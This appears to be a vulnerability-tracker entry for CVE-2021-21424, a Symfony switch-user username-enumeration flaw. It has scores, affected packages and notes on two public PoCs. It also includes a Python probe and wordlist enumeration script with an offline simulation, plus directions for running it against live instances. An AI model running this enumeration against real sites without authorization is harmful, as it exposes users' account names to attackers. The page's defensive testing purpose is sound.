CVE-2021-21424

MEDIUM

Symfony 3.4.0-3.4.48 - Unauthorized User Enumeration via Switch User Functionality

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2021-21424, both PoCs published by moften.

AI-analyzed exploit summary: the first repository is a Python-based scanner for several Symfony weaknesses (CRLF injection, Host Header Injection, and exposed Symfony Profiler endpoints) that performs safe, non-invasive checks without attempting exploitation; the second dumps data from an exposed WebProfiler. Going by those descriptions, neither repository exercises the switch-user enumeration flaw that CVE-2021-21424 actually describes: an exposed profiler or debug toolbar is a separate deployment mistake, and it is not fixed by upgrading past the affected Symfony versions listed under Products.

Description

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Users could be enumerated without the relevant permission (ROLE_ALLOWED_TO_SWITCH in Symfony's default configuration) because the switch-user functionality handled a request differently depending on whether the target user existed: an authenticated user who was not allowed to switch received one response when the target account existed and a different one when it did not, so the difference alone revealed which usernames are valid. The fix ensures that a 403 is returned in both cases, when the caller may not switch to the target user and when the target user does not exist. The patch for this issue is available for branch 3.4; the affected package ranges below cover the 2.8/3.4 and 5.0–5.2 lines, and no 4.x release is listed as affected.
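The oracle the description refers to, as an added example in Python (not code from this page, from moften's repositories, or from Symfony): a probe that compares the response to a switch-user request for a name known to exist (the tester's own account works) against responses for random nonexistent names, plus a constructed stand-in for the listener's unpatched and patched behaviour so the probe runs offline. The status the unknown-user path returned before the fix (302 in the simulation), the sample accounts and the function names are assumptions for the illustration; the patched path returning 403 in both cases is what the advisory states.

```python
"""Added example for CVE-2021-21424: probe the switch-user response oracle.

Not from the tracker page, moften's PoCs or Symfony. The simulation assumes
the pre-patch listener ends the unknown-user path with a different status
(302 here, an assumption) than the 403 it sends when the caller lacks
ROLE_ALLOWED_TO_SWITCH; the patched listener returns 403 in both cases.
"""
import secrets
from typing import Callable

# A fetch function maps a candidate target username (the value that would go
# into ?_switch_user=<name>) to the HTTP status code observed.
Fetch = Callable[[str], int]


def probe_oracle(fetch: Fetch, known_user: str, rounds: int = 3) -> dict:
    """Compare a known-existing target against random nonexistent ones.

    On a patched instance both cases answer 403 to a caller without the
    switch role, so a stable difference is the enumeration oracle.
    """
    known_status = fetch(known_user)
    unknown_statuses = {fetch("zz_" + secrets.token_hex(6)) for _ in range(rounds)}
    return {
        "known": known_status,
        "unknown": sorted(unknown_statuses),
        # stable unknown-user status that differs from the known-user status
        "oracle": len(unknown_statuses) == 1 and known_status not in unknown_statuses,
    }


def enumerate_users(fetch: Fetch, candidates: list[str], known_user: str) -> list[str]:
    """Return the candidates the target treats as existing accounts.

    Returns an empty list when no oracle is detectable, so a patched host
    never yields false positives from the wordlist.
    """
    verdict = probe_oracle(fetch, known_user)
    if not verdict["oracle"]:
        return []
    return [name for name in candidates if fetch(name) == verdict["known"]]


def make_switch_user_handler(users: set[str], patched: bool) -> Fetch:
    """Constructed stand-in for Symfony's SwitchUserListener (not its code).

    Models an authenticated caller without ROLE_ALLOWED_TO_SWITCH sending
    ?_switch_user=<target>.
    """
    def handler(target: str) -> int:
        exists = target in users
        if not exists and not patched:
            # Pre-patch: the unknown-user branch ends differently from the
            # access-denied branch (assumed 302 to the login page here).
            return 302
        # Patched: both "may not switch" and "no such user" end as 403.
        return 403

    return handler


if __name__ == "__main__":
    accounts = {"alice", "bob"}  # constructed sample accounts
    wordlist = ["alice", "carol", "bob", "dave"]
    for label, patched in (("unpatched", False), ("patched", True)):
        fetch = make_switch_user_handler(accounts, patched)
        print(label, probe_oracle(fetch, "alice"), enumerate_users(fetch, wordlist, "alice"))
```

Against a live instance, `fetch` would issue an authenticated GET to a protected URL with `?_switch_user=<name>` appended, with redirects disabled so that a bounce to the login page is observed as its own status rather than followed; run it with a test account that does not hold ROLE_ALLOWED_TO_SWITCH, and use that account's own username as the known user. A patched deployment shows the same status for every name, which is the check to run after upgrading.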

Exploits (2)

nomisec SCANNER
by moften · poc
https://github.com/moften/Symfony-CVE-Scanner-PoC-

This repository contains a Python-based scanner for detecting multiple vulnerabilities in Symfony applications, including CRLF injection, Host Header Injection, and exposed Symfony Profiler endpoints. It performs safe, non-invasive checks without attempting exploitation.

Classification: Scanner (95%)
Attack Type: Info Leak
Complexity: Moderate
Reliability: Reliable
Target: Symfony (various versions)
Authentication: none needed
Prerequisites: Network access to the target Symfony application
Analyzed by devstral-2 on Feb 16, 2026
nomisec WORKING POC
by moften · poc
https://github.com/moften/CVE-2021-21424

The repository contains a working Python script that, despite its name, does not exercise the switch-user flaw: it enumerates Symfony WebProfiler tokens and dumps sensitive information exposed through the profiler interface, using directory traversal through the profiler to read internal server paths and environment variables. That only works when the WebProfiler or debug toolbar is reachable in production, a misconfiguration independent of CVE-2021-21424, so a hit from this script means the profiler must be disabled, not that the Symfony version is unpatched.

Classification: Working PoC (95%)
Attack Type: Info Leak
Complexity: Trivial
Reliability: Reliable
Target: Symfony 2.8 to 5.x
Authentication: none needed
Prerequisites: Symfony WebProfiler or Dev Toolbar accessible in production; network access to the target server
Analyzed by devstral-2 on Feb 18, 2026

Scores

CVSS v3 5.3
EPSS 0.0034
EPSS Percentile 57.1%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

CWE
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-203 (Observable Discrepancy)
Status published
Products (10)
fedoraproject/fedora 33
fedoraproject/fedora 34
lexik/jwt-authentication-bundle 2.0.0 - 2.10.7 (Packagist)
sensiolabs/symfony 2.8.0 - 3.4.48
symfony/maker-bundle 1.27.0 - 1.29.2 (Packagist)
symfony/security 5.0.0 - 5.2.8 (Packagist)
symfony/security-core 2.8.0 - 3.4.48 (Packagist)
symfony/security-guard 2.8.0 - 3.4.48 (Packagist)
symfony/security-http 5.1.0 - 5.2.8 (Packagist)
symfony/symfony 2.8.0 - 3.4.49 (Packagist)
Published May 13, 2021
Tracked Since Feb 18, 2026